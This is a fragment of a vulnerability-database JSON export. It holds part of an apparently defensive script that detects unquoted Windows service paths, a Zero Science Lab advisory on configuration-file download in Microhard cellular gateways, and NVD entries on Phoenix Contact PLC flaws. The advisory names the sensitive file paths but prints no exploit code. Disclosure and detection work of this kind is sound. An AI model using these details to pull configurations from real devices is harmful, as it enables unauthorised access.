);\n path_name = service_split[2];\n\n # If the path is within quotes we know its not vulnerable...\n if( egrep( string:path_name, pattern:'^\".*\"' ) )\n continue;\n\n # Basic clean-up of parameters at the end of the path_name avoid false positives if there is only a space before the parameter\n path_name = ereg_replace( string:path_name, pattern:\"\\s+(/|\\-|\\-\\-).*\", replace:\"\" ); # TODO evaluate a regex which might catch a service using something like C:\\program\\myservice.exe parameter1 and similar\n if( ' ' >< path_name && ! egrep( string:path_name, pattern:'^\".*\"' ) ) {\n services_report += service + '\\n';\n SERVICES_VULN = TRUE;\n }\n }\n }\n }\n}\n\n# Only try accessing the registry if we know it is working / possible\n# nb: We don't query Win32_Product via WMI here on purpose as this is quite slow\nif( get_kb_item( \"SMB/registry_access\" ) ) {\n\n # The Uninstall registry keys which might hold an \"unquoted\" path as well\n foreach item( make_list( \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\", \"Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" ) ) {\n\n itemList = registry_enum_keys( key:item );\n\n foreach key( itemList ) {\n fullKey = item + \"\\\" + key;\n\n uninstallstring = registry_get_sz( key:fullKey, item:\"UninstallString\" );\n if( strlen( uninstallstring ) > 0 ) {\n\n # If the path doesn't start with something like C:\\foo\\uninstall.exe (e.g. MsiExec.exe /X{ or \"C:\\foo\\uninstall) we know its not vulnerable...\n if( egrep( string:uninstallstring, pattern:\"^[a-zA-Z]:\\\\.*\" ) ) {\n\n # Basic clean-up of parameters at the end of the uninstallstring avoid false positives if there is only a space before the parameter\n _uninstallstring = ereg_replace( string:uninstallstring, pattern:\"\\s+(/|\\-|\\-\\-).*\", replace:\"\" ); # TODO evaluate a regex which might catch a service using something like\n # C:\\program\\myuninstall.exe parameter1 and similar\n\n if( ' ' >< _uninstallstring && ! egrep( string:_uninstallstring, pattern:'^\".*\"' ) ) {\n uninstall_report += fullKey + \"|\" + uninstallstring + '\\n';\n UNINSTALL_VULN = TRUE;\n }\n }\n }\n\n quietuninstallstring = registry_get_sz( key:fullKey, item:\"QuietUninstallString\" );\n if( strlen( quietuninstallstring ) > 0 ) {\n\n # If the path doesn't start with something like C:\\foo\\uninstall.exe (e.g. MsiExec.exe /X{ or \"C:\\foo\\uninstall) we know its not vulnerable...\n if( egrep( string:quietuninstallstring, pattern:\"^[a-zA-Z]:\\\\.*\" ) ) {\n\n # Basic clean-up of parameters at the end of the uninstallstring avoid false positives if there is only a space before the parameter\n _quietuninstallstring = ereg_replace( string:quietuninstallstring, pattern:\"\\s+(/|\\-|\\-\\-).*\", replace:\"\" ); # TODO evaluate a regex which might catch a service using something like\n # C:\\program\\myuninstall.exe parameter1 and similar\n\n if( ' ' >< _quietuninstallstring && ! egrep( string:_quietuninstallstring, pattern:'^\".*\"' ) ) {\n uninstall_report += fullKey + \"|\" + quietuninstallstring + '\\n';\n UNINSTALL_VULN = TRUE;\n }\n }\n }\n }\n }\n}\n\nif( SERVICES_VULN || UNINSTALL_VULN ) {\n\n if( UNINSTALL_VULN ) {\n report = \"The following 'Uninstall' registry entries are using an 'unquoted' path:\";\n report += '\\n\\nKey|Value\\n';\n report += uninstall_report;\n log_message( port:0, data:report ); # nb: We don't want to report a vulnerability for now as a admin would need to actively uninstall a software to trigger this vulnerability.\n }\n\n if( SERVICES_VULN ) {\n report = \"The following services are using an 'unquoted' service path:\";\n report += '\\n\\nDisplayName|Name|PathName\\n';\n report += services_report;\n security_message( port:0, data:report );\n }\n}\n\nexit( 0 );", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zeroscience": [{"lastseen": "2019-03-20T18:09:42", "bulletinFamily": "exploit", "description": "Title: Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Configuration Download \nAdvisory ID: [ZSL-2018-5484](<ZSL-2018-5484.php>) \nType: Local/Remote \nImpact: Exposure of System Information, Privilege Escalation, Exposure of Sensitive Information, DoS, Security Bypass \nRisk: (4/5) \nRelease Date: 17.07.2018 \n\n\n##### Summary\n\nThe new IPn4Gb provides a rugged, industrial strength wireless solution using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb features integrated Firewall, IPSec / VPN &amp; GRE Tunneling, IP/MAC Access Control Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial RS232/485/422 devices! \n \nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses the widespread deployment of cellular network infrastructure for critical data collection. From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers! The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It provides robust and secure wireless communication of Serial, USB and Ethernet data. \n \nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things to the next level by providing features such as Ethernet with PoE, RS232 Serial port and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution worth looking at! \n \nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength wireless IoT &amp; M2M solution. Connect any device, wired or wireless, and provide remote cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight system integration and design flexibility with dual Ethernet Ports and high power 802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access Control Lists, the Dragon-LTE provides a solution for any cellular application! \n \nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE network infrastructure for critical data communications. The VIP4Gb provides simultaneous network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network. It provides robust and secure wireless communication of Serial, Ethernet &amp; WiFi data. \n\n##### Description\n\nThe system backup configuration file 'IPn4G.config' in '/' directory or its respective name based on the model name including the similar files in '/www/cgi-bin/system.conf', '/tmp' and the cli.conf in '/etc/m_cli/' can be downloaded by an authenticated attacker in certain circumstances. This will enable the attacker to disclose sensitive information and help her in authentication bypass, privilege escalation and/or full system access. \n\n##### Vendor\n\nMicrohard Systems Inc. - <http://www.microhardcorp.com>\n\n##### Affected Version\n\nIPn4G 1.1.0 build 1098 \nIPn3Gb 2.2.0 build 2160 \nIPn4Gb 1.1.6 build 1184-14 \nIPn4Gb 1.1.0 Rev 2 build 1090-2 \nIPn4Gb 1.1.0 Rev 2 build 1086 \nBullet-3G 1.2.0 Rev A build 1032 \nVIP4Gb 1.1.6 build 1204 \nVIP4G 1.1.6 Rev 3.0 build 1184-14 \nVIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196 \nIPn3Gii / Bullet-3G 1.2.0 build 1076 \nIPn4Gii / Bullet-LTE 1.2.0 build 1078 \nBulletPlus 1.3.0 build 1036 \nDragon-LTE 1.1.0 build 1036 \n\n##### Tested On\n\nhttpd-ssl-1.0.0 \nLinux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3) \n\n##### Vendor Status\n\n[13.03.2018] Vulnerability discovered. \n[13.03.2018] Vendor contacted. \n[09.05.2018] No response from the vendor. \n[10.05.2018] Vendor contacted again. \n[24.05.2018] No response from the vendor. \n[25.05.2018] Vendor contacted again. \n[16.07.2018] No response from the vendor. \n[17.07.2018] Public security advisory released. \n\n##### PoC\n\n[microhard_config.txt](<../../codes/microhard_config.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - &lt;[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)&gt;\n\n##### References\n\n[1] <https://www.exploit-db.com/exploits/45036/> \n[2] <https://packetstormsecurity.com/files/148573> \n[3] <https://exchange.xforce.ibmcloud.com/vulnerabilities/146623> \n[4] <https://cxsecurity.com/issue/WLB-2018070164>\n\n##### Changelog\n\n[17.07.2018] - Initial release \n[23.07.2018] - Added reference [1], [2], [3] and [4] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "ZSL-2018-5484", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2018-5484.php", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Configuration Download", "type": "zeroscience", "sourceData": "REQUEST LIMIT REACHED", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/microhard_config.txt"}], "cve": [{"lastseen": "2018-10-15T10:40:23", "bulletinFamily": "NVD", "description": "The web server in Phoenix Contact ILC PLCs allows access to read and write PLC variables without authentication.", "modified": "2018-10-14T06:29:00", "published": "2018-04-05T12:29:00", "id": "CVE-2016-8380", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8380", "title": "CVE-2016-8380", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-14T10:38:19", "bulletinFamily": "NVD", "description": "Webvisit in Phoenix Contact ILC PLCs offers a password macro to protect HMI pages on the PLC against casual or coincidental opening of HMI pages by the user. The password macro can be configured in a way that the password is stored and transferred in clear text.", "modified": "2018-10-13T06:29:00", "published": "2018-04-05T12:29:00", "id": "CVE-2016-8366", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8366", "title": "CVE-2016-8366", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-10-15T10:40:23", "bulletinFamily": "NVD", "description": "The web server in Phoenix Contact ILC PLCs can be accessed without authenticating even if the authentication mechanism is enabled.", "modified": "2018-10-14T06:29:00", "published": "2018-04-05T12:29:00", "id": "CVE-2016-8371", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8371", "title": "CVE-2016-8371", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}